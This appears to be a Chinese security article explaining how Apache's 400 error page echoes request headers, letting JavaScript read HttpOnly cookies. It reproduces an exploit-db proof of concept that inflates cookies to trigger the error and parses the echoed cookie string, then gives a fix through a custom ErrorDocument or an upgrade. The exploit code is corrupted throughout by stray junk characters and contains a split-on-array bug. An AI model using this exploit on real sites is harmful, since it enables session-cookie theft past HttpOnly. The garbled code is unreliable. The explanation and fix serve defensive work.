很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 cookie,一般都会给 cookie 加上 HttpOnly 属性,禁止 JS 直接读取用户的 cookie,从而降低 XSS 的危害;而本文所述的问题(Apache 在 400 错误页中回显请求头)恰好可以用来绕过 cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点,按 F12 打开开发者工具,在 Console 中输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
( v0 `) O5 M3 S3 ?3 Z/ D. Gfunction setCookies (good) {) G9 S" H' z0 r) J4 Y
// Construct string for cookie value
4 A k* r. _8 y$ }6 fvar str = "";, p5 G/ s0 w, y
for (var i=0; i< 819; i++) {' N- E, f- J4 w4 M0 d
str += "x";
: o3 ]& f# e+ p}
) t" P6 P8 m% ]4 y// Set cookies
, S# ~4 M; f% p- W6 N" y8 Cfor (i = 0; i < 10; i++) {
, a9 L+ p. V: m p9 y3 Q8 P2 a- ]// Expire evil cookie6 @0 x S7 i) V* w w
if (good) {
: F% |3 F- ~+ p2 S: D7 w: ?3 \% zvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
- }3 L/ A( X+ s2 \' _0 F/ M}
r( ]* d+ W6 @// Set evil cookie9 T( H, R7 W$ T, r0 O+ ]
else {+ _% U* d h# U9 W5 Q; e
var cookie = "xss"+i+"="+str+";path=/";7 G& X. c2 G# [
}* l- z S2 V! E# r5 ~4 h
document.cookie = cookie;- b! U4 U$ ~0 I
}* F$ |7 q* j0 Z2 J
}
// makeRequest(): sets the filler cookies, then issues a GET to "/" from the
// current origin and hands the response to parseCookies().
// The information exposure this relies on is entirely server-side: the 400
// error page echoes the request's headers (including "Cookie: ...") inside a
// <pre> block, so HttpOnly is bypassed by reading the response body, not
// document.cookie. A custom ErrorDocument 400 or a patched Apache (see the
// fix section below this listing) stops the echo and closes the gap.
; f( R- f% o0 y* Y4 jfunction makeRequest() {
// Install the ten oversized xss<n> cookies before sending the request.
7 x0 L' U4 ]8 E; w. QsetCookies();
// onreadystatechange handler; reads `xhr` from the enclosing scope
// (the var is hoisted; the handler only runs after xhr is assigned below).
) T: r. b) k1 k& R0 Z4 cfunction parseCookies () {/ D0 `+ A0 W0 x" t$ ? y' Z8 K
var cookie_dict = {};* v4 F! g2 ^" Y
// Only act on a completed request (readyState 4) that came back as 400.
if (xhr.readyState === 4 && xhr.status === 400) {3 Q/ d: k9 p- a4 s! |, k( l
// Strip CR/LF so the <pre>...</pre> block can be matched as one line.
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
) [' G& A' N1 a) F3 D; xif (content.length) {9 s2 q4 ]3 k s" c g
// Drop the "Cookie: " header name so only the cookie string remains.
( O0 o( f' z# x& scontent = content[1].replace("Cookie: ", ""); u8 G$ X1 H% U& `* k7 R
// Remove the xss<digit>=xxx... filler cookies, then split on ';'.
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
- f% ^$ a4 T7 P, W _# C// Collect the remaining name=value pairs into cookie_dict.
for (var i=0; i<cookies.length; i++) {. F& D# F$ F( d" O4 d
var s_c = cookies.split('=',2);9 ^( H$ T9 u. P4 Q' ~: a
cookie_dict[s_c[0]] = s_c[1];
8 w1 A# C5 i. P# ~" z}9 H8 E* _! d5 M) I& [1 D. z5 Z
}
# r7 R9 I- c% _, z4 P, P; M; S9 r// Expire the filler cookies again so later requests are normal-sized.
1 q N. {: k9 z2 w& |" ~setCookies(true);
! T( w: ~' Q$ y7 w% malert(JSON.stringify(cookie_dict));
2 E, b+ \7 X8 ?}
9 n; Q4 j/ B0 ?- {) M. U+ ~! l3 M}% g7 ?/ P7 @0 x
// Asynchronous same-origin GET of "/"; parseCookies handles the state changes.
var xhr = new XMLHttpRequest();) \. b( ]4 g8 E4 Z8 s, }; u7 J2 N
xhr.onreadystatechange = parseCookies;& V+ w" q1 c6 M6 W5 }( Q
xhr.open("GET", "/", true);
1 b- A" U4 D$ f; r% fxhr.send(null);# T% [0 m1 p3 s. |
}
// Entry point: runs the sequence above once the snippet is pasted into the console.
e: j. F+ l7 hmakeRequest();* U, O$ d5 z% F8 P7 `5 B
就能看到一个 400 错误响应,其中包含了 cookie 信息。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:
2 \& z2 b( u/ Z" V5 C9 H6 OApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
4 w' x" g _ n7 s0 ~% z
In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message —— 输出一个简单生硬的错误信息
2. output a customized message —— 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL

经测试,对于 400 错误只有方法 2 有效,响应包中不再包含 cookie 内容。
Apache 配置:
ErrorDocument 400 "security test"
当然,升级 Apache 到已修复该问题的最新版本也可以(自定义 ErrorDocument 只是避免在错误页中回显请求头,升级才是根本修复):)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html